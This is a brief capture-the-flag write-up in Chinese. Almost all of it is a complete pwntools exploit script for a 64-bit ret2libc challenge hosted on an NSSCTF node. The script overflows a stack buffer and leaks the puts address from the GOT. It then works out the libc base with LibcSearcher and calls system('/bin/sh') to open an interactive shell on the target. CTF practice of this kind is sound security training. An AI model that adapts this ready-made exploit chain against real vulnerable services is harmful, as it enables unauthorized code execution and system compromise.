这道题是简单的 libc 题（ret2libc），不过多分析了。
exp:
from pwn import *
from LibcSearcher import *
# Two-round ret2libc chain against the CTF service named below.
# Round 1 overflows the stack buffer and calls puts(puts@got) to leak a
# libc pointer, then returns to main; round 2 reuses the same overflow to
# call system("/bin/sh") with the now-known libc base.
# NOTE(review): every address below (main, gadgets, offsets) is hard-coded,
# so the chain only works for a non-PIE binary without a stack canary —
# exactly the mitigations that would break it.
io=remote("node5.anna.nssctf.cn",28341)  # challenge instance from the writeup
elf=ELF("./pwn")  # local copy of the binary, used only to read GOT/PLT entries
put_got=elf.got["puts"]  # GOT slot of puts: holds the libc address we want to leak
put_plt=elf.plt["puts"]  # PLT stub of puts: the call target for the leak
main_addr=0x4011A6  # hard-coded address of main; returning here gives a second input round
rdi=0x401273  # gadget address found with: ROPgadget --binary pwn | grep "rdi"
              # presumably a "pop rdi; ret" gadget (used to set the first argument) — confirm
ret=0x40101a  # bare "ret" gadget; presumably inserted for 16-byte stack alignment before system — confirm
io.recvuntil(b"Start Your Input:\n")  # wait for the program's prompt
# 0x100 bytes of buffer + 0x8 bytes (presumably the saved rbp) reach the return address;
# then: pop rdi <- puts@got ; call puts@plt ; return into main.
payload=b'a'*0x100+b'a'*0x8+p64(rdi)+p64(put_got)+p64(put_plt)+p64(main_addr)
io.send(payload)
# puts prints the 6 significant bytes of the 64-bit pointer; pad to 8 for u64.
# NOTE(review): assumes nothing else is printed before the leak — verify against the binary.
puts_addr=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
# LibcSearcher (third-party) guesses the remote libc build from the leaked
# puts address; dump() then returns symbol offsets for that build.
libc=LibcSearcher("puts",puts_addr)
base=puts_addr-libc.dump("puts")  # libc load base = leaked address - symbol offset
system_addr=base+libc.dump("system")
str_bin_sh=base+libc.dump("str_bin_sh")  # address of the "/bin/sh" string inside libc
# Same padding as round 1; then: pop rdi <- "/bin/sh" ; ret (alignment) ; system.
shell=b'a'*0x100+b'a'*0x8+p64(rdi)+p64(str_bin_sh)+p64(ret)+p64(system_addr)
io.recvuntil(b"Start Your Input:\n")  # main ran again, so the prompt reappears
io.send(shell)
io.interactive()  # hand the connection over to the user